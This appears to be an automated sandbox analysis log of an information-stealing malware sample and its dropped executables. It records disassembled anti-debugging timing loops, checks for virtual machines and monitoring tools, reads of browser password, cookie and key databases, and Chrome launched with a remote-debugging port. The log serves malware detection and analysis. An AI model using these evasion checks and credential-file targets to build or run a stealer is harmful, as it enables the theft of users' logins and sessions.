Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0657 second address: 4CB06CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e pushad 0x0000000f mov dx, ax 0x00000012 movzx esi, dx 0x00000015 popad 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push esi 0x0000001d pop eax 0x0000001e call 00007F4FB8FDD507h 0x00000023 jmp 00007F4FB8FDD508h 0x00000028 pop ecx 0x00000029 popad 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F4FB8FDD4FAh 0x00000034 xor esi, 48E9FB58h 0x0000003a jmp 00007F4FB8FDD4FBh 0x0000003f popfd 0x00000040 mov dx, cx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB06CB second address: 4CB06DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D62280h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB06DF second address: 4CB070A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD4FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 69C1EE37h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4FB8FDD501h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB070A second address: 4CB070E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB070E second address: 4CB0714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0714 second address: 4CB0733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ch 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 0D2EBFC9h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4FB8D6227Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0733 second address: 4CB0779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD4FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4FB8FDD4FBh 0x00000018 adc cx, 2A3Eh 0x0000001d jmp 00007F4FB8FDD509h 0x00000022 popfd 0x00000023 mov bh, al 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0779 second address: 4CB077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB077F second address: 4CB07A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4FB8FDD507h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07A1 second address: 4CB07E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4FB8D62281h 0x0000000f nop 0x00000010 pushad 0x00000011 mov bx, ax 0x00000014 mov bx, si 0x00000017 popad 0x00000018 sub esp, 1Ch 0x0000001b pushad 0x0000001c push esi 0x0000001d push ebx 0x0000001e pop ecx 0x0000001f pop edx 0x00000020 push eax 0x00000021 push edx 0x00000022 mov bx, si 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07E6 second address: 4CB07F6 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 9BB1h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07F6 second address: 4CB080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62285h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB080F second address: 4CB0839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FB8FDD507h 0x00000008 movzx eax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 push eax 0x00000014 push edx 0x00000015 movzx eax, dx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0839 second address: 4CB0871 instructions: 0x00000000 rdtsc 0x00000002 mov esi, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e pushfd 0x0000000f jmp 00007F4FB8D62286h 0x00000014 sub ecx, 4641F4A8h 0x0000001a jmp 00007F4FB8D6227Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0871 second address: 4CB08AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FB8FDD4FFh 0x00000009 and al, FFFFFFEEh 0x0000000c jmp 00007F4FB8FDD509h 0x00000011 popfd 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08AE second address: 4CB08B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08B4 second address: 4CB08C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8FDD4FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08C5 second address: 4CB08C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08C9 second address: 4CB08F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 0929h 0x0000000e mov ax, 0EE5h 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 jmp 00007F4FB8FDD500h 0x00000019 xchg eax, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, di 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08F6 second address: 4CB08FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08FB second address: 4CB091A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB091A second address: 4CB0936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62288h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0936 second address: 4CB0963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD4FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov edx, ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [76FBB370h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4FB8FDD4FEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0963 second address: 4CB0967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0967 second address: 4CB096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB096D second address: 4CB09FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007F4FB8D62280h 0x00000011 xor eax, ebp 0x00000013 jmp 00007F4FB8D62281h 0x00000018 nop 0x00000019 pushad 0x0000001a movzx eax, bx 0x0000001d pushfd 0x0000001e jmp 00007F4FB8D62289h 0x00000023 and cx, 9A76h 0x00000028 jmp 00007F4FB8D62281h 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007F4FB8D62281h 0x00000035 nop 0x00000036 pushad 0x00000037 mov edi, esi 0x00000039 popad 0x0000003a lea eax, dword ptr [ebp-10h] 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push edx 0x00000041 pop esi 0x00000042 mov ah, dh 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB09FE second address: 4CB0A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD505h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4FB8FDD4FDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0A2C second address: 4CB0A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D2E855 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: ED2582 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F60997 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9CE855 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: B72582 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C00997 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Special instruction interceptor: First address: 1544C2C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Special instruction interceptor: First address: 16F9EFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Special instruction interceptor: First address: 172860B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Special instruction interceptor: First address: 178CB7D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D007D8 rdtsc 0_2_04D007D8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1423
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 385
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1400
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1404
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7848 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7848 Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7820 Thread sleep count: 1423 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7820 Thread sleep time: -2847423s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796 Thread sleep count: 385 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796 Thread sleep time: -11550000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8000 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7828 Thread sleep count: 1400 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7828 Thread sleep time: -2801400s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7824 Thread sleep count: 1404 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7824 Thread sleep time: -2809404s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe TID: 8112 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe TID: 8116 Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe TID: 8108 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe TID: 8104 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\
Source: skotes.exe, skotes.exe, 00000006.00000002.2923958701.0000000000B56000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000006.00000002.2925443707.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2925443707.0000000001529000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1716978686.0000000000EB6000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1745303952.0000000000B56000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1763922405.0000000000B56000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2923958701.0000000000B56000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: chrome.exe, 00000009.00000002.2830020854.0000018B8F758000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\P.P
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D004E1 Start: 04D00562 End: 04D004AE 0_2_04D004E1
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D007D8 rdtsc 0_2_04D007D8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0099652B mov eax, dword ptr fs:[00000030h] 6_2_0099652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0099A302 mov eax, dword ptr fs:[00000030h] 6_2_0099A302
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe "C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe"
Source: skotes.exe, skotes.exe, 00000006.00000002.2923958701.0000000000B56000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: PProgram Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0097D3E2 cpuid 6_2_0097D3E2
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0097CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_0097CBEA
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0.2.file.exe.cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1704826210.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1673233222.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2274009732.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1716902262.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2923737687.0000000000961000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1723341065.0000000005180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1745233111.0000000000961000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1763773337.0000000000961000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP